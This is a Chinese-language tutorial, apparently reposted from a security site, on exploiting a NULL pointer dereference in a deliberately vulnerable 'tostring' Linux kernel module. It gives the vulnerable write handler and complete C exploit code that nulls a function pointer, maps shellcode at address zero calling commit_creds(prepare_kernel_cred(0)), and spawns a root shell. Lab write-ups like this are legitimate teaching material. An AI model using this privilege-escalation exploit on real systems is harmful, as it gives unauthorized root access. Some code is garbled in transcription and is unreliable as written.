内核exploit——如何应对空指针异常现象

安全 网站安全
如果一个未初始化或零编号(zero-ed out)的指针被取消引用时,将会导致程序计数器/指令指针(PC/IP)指向0,从而导致内核崩溃!目前有一些内核结构,持有当前的进程权限。我们将尝试利用权限来进行root,并在处理完这些后再追加一个shell命令。

什么是空指针异常?

如果一个未初始化或零编号(zero-ed out)的指针被取消引用时,将会导致程序计数器/指令指针(PC/IP)指向0,从而导致内核崩溃!

当遇到上述情况,首先需检查是否启用了任何保护程序,如果启用了就将其全部关闭,包括管理员保护模式、数据执行保护模式(DEP / NX)以及mmap_min_addr保护机制。

ring0层与ring3层有所区别(Intel的CPU将特权级别分为4个级别:RING0、RING1、RING2、RING3。Windows只使用其中的两个级别RING0和RING3,RING0只给操作系统用,RING3谁都能用)。由于计算机使用二进制,因此在ring3层操作过程中,我们仅需要关注如何追加一个shell命令,我们需要这个时间来修改权限。庆幸的是,目前仍存在一些内核结构,持有当前的进程权限。我们将尝试利用权限来进行root,并在处理完这些后再追加一个shell命令。

如何提升权限?

在进行提升权限操作前,我们需要知道我们需要做哪些事情:

每个进程信息都存储为一个进程描述符(task_struct)

下列是sched.h文件:

  1. struct task_struct { 
  2. /* ... */ 
  3. /* Process credentials: */ 
  4. /* Tracer's credentials at attach: */ 
  5. const struct cred __rcu *ptracer_cred; 
  6. /* Objective and real subjective task credentials (COW): */ 
  7. const struct cred __rcu *real_cred; 
  8. /* Effective (overridable) subjective task credentials (COW): */ 
  9. const struct cred __rcu *cred; 
  10. /* ... */ 
  11. 下列是cred.h文件: 
  12. struct cred { 
  13. /* ... */ 
  14. kuid_tuid;/* real UID of the task */ 
  15. kgid_tgid;/* real GID of the task */ 
  16. kuid_tsuid;/* saved UID of the task */ 
  17. kgid_tsgid;/* saved GID of the task */ 
  18. kuid_teuid;/* effective UID of the task */ 
  19. kgid_tegid;/* effective GID of the task */ 
  20. /* ... */ 

下面我们将主要关注有效的用户身份证明(UID)任务。如果我们成功将其值设置为0,则当前任务将具有root权限!

我们应该如何找到他们?

可以利用一些内核符号。

一些功能可用于提升当前的进程权限,它们的地址是静态的,可以根据我们处理的内核重新生成:

  1. /proc/kallsyms, /proc/ksyms, /dev/ksyms.. 

上述这些函数在cred.c.中。

  1. extern int commit_creds(struct cred *); 
  2. /* ... */ 
  3. extern struct cred *prepare_kernel_cred(struct task_struct *); 

我们可以看到,prepare_kernel_cred()函数的返回值类型为struct cred *,之后再以此作为参数传递给commit_creds(),这样就可以将我们新获得的权限分配给当前的进程!

结论:可以通过“commit_creds(prepare_kernel_cred(0))”命令来提升权限;

了解漏洞并学会触发这些漏洞

在进行内核开发前,我们需要知道如何触发漏洞,还需要知道在什么情况下指针会被取消。

[[207671]]

解决内核威胁问题

我们首先需要检查保护程序

解决内核威胁问题

如上图所示,所有的保护措施都出于关闭状态。

在“tostring_write()”函数里,我们可以看到这些命令应该始终以10'*'开头。

当这个内核模块被加载时,它会在每次运行时启动结构,每次运行都会启动一次。

如上图所示,我们不难发现这会启动“tostring_create()”。当在“tostring_s struct!”下设置函数指针时,该功能就会响应

这一点非常重要,请谨记于心!因此,这两个指针在每次运行时都被设置一次(或者需要的话)。

现在我们轻易地就能辨认出漏洞的函数,如下所示:

  1. static ssize_t tostring_write(struct file *f, const char __user *buf,size_t len, loff_t *off) 
  2. char *bufk; 
  3. int i,j; 
  4. printk(KERN_INFO "Tostring: write()\n"); 
  5. bufk = kmalloc(len + 1, GFP_DMA); 
  6. if (bufk){ 
  7. if (copy_from_user(bufk, buf, len)) 
  8.     return -EFAULT; 
  9. bufk[len] = '\0'; 
  10. i=0
  11. while(i <len) { 
  12.   for (j=0;(j<10) && (bufk[j]=='*');j++); 
  13.   if (j == 10) { 
  14.     for (j=i+10;(bufk[j]!='\0') && (bufk[j] != '\n');j++); 
  15.     bufk[j]='\0'; 
  16.     printk("Tostring: Cmd %s\n",bufk+i+10); 
  17.     switch(bufk[i+10]) { 
  18.     case 'H': 
  19.       tostring->tostring_readtostring_read_hexa
  20.       break; 
  21.     case 'D': 
  22.       tostring->tostring_readtostring_read_dec
  23.       break; 
  24.     case 'S': 
  25.       printk("Tostring: Delete stack\n"); 
  26.       kfree(tostring->tostring_stack); 
  27.       tostring->tostring_stack=NULL
  28.       tostring->tostring_read=NULL
  29.       tostring->pointer=0
  30.       tostring->pointer_max=0
  31.       break; 
  32.     case 'N': 
  33.       printk("Tostring: Stack create with size %ld\n",local_strtoul(bufk+i+11,NULL,10)); 
  34.       if (tostring->tostring_stack==NULL) tostring_create(local_strtoul(bufk+i+11,NULL,10)); 
  35.       if (tostring->tostring_stack==NULL) printk("Tostring: Error, impossible to create stack\n"); 
  36.       break; 
  37.     } 
  38.     i=j+1; 
  39.   } 
  40.   else { 
  41.     printk("tostring: insertion %lld\n",*((long long int *) (bufk+i))); 
  42.     if (tostring->pointer >= tostring->pointer_max) 
  43.       printk(KERN_INFO "Tostring: Stack full\n"); 
  44.     else 
  45.       tostring->tostring_stack[(tostring->pointer)++]= *((long long int *) (bufk+i)); 
  46.     ii = i+sizeof(long long int); 
  47.   } 
  48. kfree(bufk); 
  49. return len; 

正如我们所见,在“ten '*'”后会出现一个“S”。这就会使函数指针tostring_read无效,而这一点对我们有力。

但是,在将其设置为null之后,我们需要读取它,以使其被取消引用。因此,我们需要读取该文件,以触发启用“tostring_read()!”命令。

http://p8.qhimg.com/t013e67bd64133d02e9.png

我们开始编写开发程序。我们之前使用Python语言进行编写,现在我们换成C语言。

我们先写一个较为简单的以触发命令和清除函数指针。

  1. #include <stdio.h> 
  2. #include <string.h> 
  3. #include <stdlib.h> 
  4. #include <sys/mman.h> 
  5. #include <fcntl.h> 
  6. /**/ 
  7. #define vulnerable_device "/dev/tostring" 
  8. /**/ 
  9. void main(void){ 
  10. int fd; 
  11. char payload[15]; 
  12. /**/ 
  13. memset(payload, '*', 10); 
  14. /**/ 
  15. payload[10] = 'S'; 
  16. payload[11] = 0; 
  17. /**/ 
  18. fd = open(vulnerable_device, O_RDWR); 
  19. if(fd < 0){ 
  20. printf("Couldn't open device!"); 
  21. /**/ 
  22. write(fd, payload, 12); 

目前一切都比较顺利,但我们仍需通过读取文件使其取消引用。

  1. read(fd, 0, 1) 

我们做到了,我们将其IP指针设置为0

幸运的是,mmap_min_addr保护处于关闭状态。 我们可以在NULL中分配一个小区域,并放置我们的shellcode来提升权限。

现在就可以从“/proc/kallsyms!”中获得“prepare_kernel_cred”和“commit_creds”地址。

http://p3.qhimg.com/t015c9180be49718961.png

我将使用rasm2做一个shellcode:

以下是shellcode:

在我们的开发程序中取消指针前,我们就可以开始添加shellcode:

  1. #include <stdio.h> 
  2. #include <string.h> 
  3. #include <stdlib.h> 
  4. #include <sys/mman.h> 
  5. #include <fcntl.h> 
  6. /**/ 
  7. #define vulnerable_device "/dev/tostring" 
  8. /**/ 
  9. void pop_shell(){ 
  10. system("sh"); 
  11. /**/ 
  12. void main(void){ 
  13. int fd; 
  14. char payload[15]; 
  15. char shellcode[15] = "\x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3"; 
  16. /**/ 
  17. memset(payload, '*', 10); 
  18. /**/ 
  19. payload[10] = 'S'; 
  20. payload[11] = 0; 
  21. /**/ 
  22. fd = open(vulnerable_device, O_RDWR); 
  23. if(fd < 0){ 
  24. printf("Couldn't open device!"); 
  25. write(fd, payload, 12); 
  26. /**/ 
  27. mmap(NULL, sizeof(shellcode), PROT_EXEC |PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS |MAP_FIXED, -1, 0); 
  28. memcpy(NULL, shellcode, sizeof(shellcode)); 
  29. /**/ 
  30. read(fd, 0, 1); 
  31. /**/ 
  32. pop_shell(); 

在完成后,开始运行

以下是root shell

https://s5.51cto.com/oss/201710/25/87a7925d8110979ef1b53d535e43e1d6.png

希望文章能对大家有所启发和帮助!

责任编辑:赵宁宁 来源: 安全客
相关推荐

2010-03-09 14:10:13

Python循环语句

2019-05-17 09:02:19

TCP协议服务端

2019-05-28 09:40:39

TCP协议socket接口

2010-02-23 18:05:40

WCF异常现象

2019-05-19 16:53:57

TCP协议TCP通信三次握手

2019-05-16 15:19:40

TCP协议TCP通信三次握手

2023-12-26 15:06:00

Linux内核转储

2022-02-25 23:54:43

人工智能数据计算

2018-08-16 08:40:50

空气污染物联网IOT

2015-12-02 10:09:05

雾霾数据中心

2014-03-13 16:59:11

独立开发者刷榜排名

2015-07-30 10:12:32

JavaNullAssert

2023-09-14 13:13:35

DNA千年外星人

2009-12-01 18:43:33

2013-07-11 09:51:15

2012-02-28 09:57:32

机房空调

2015-07-27 11:34:03

Linux内核指针

2009-05-14 15:13:29

2022-01-19 09:00:00

Java空指针开发

2018-09-26 17:33:37

机器学习人工智能计算机
点赞
收藏

51CTO技术栈公众号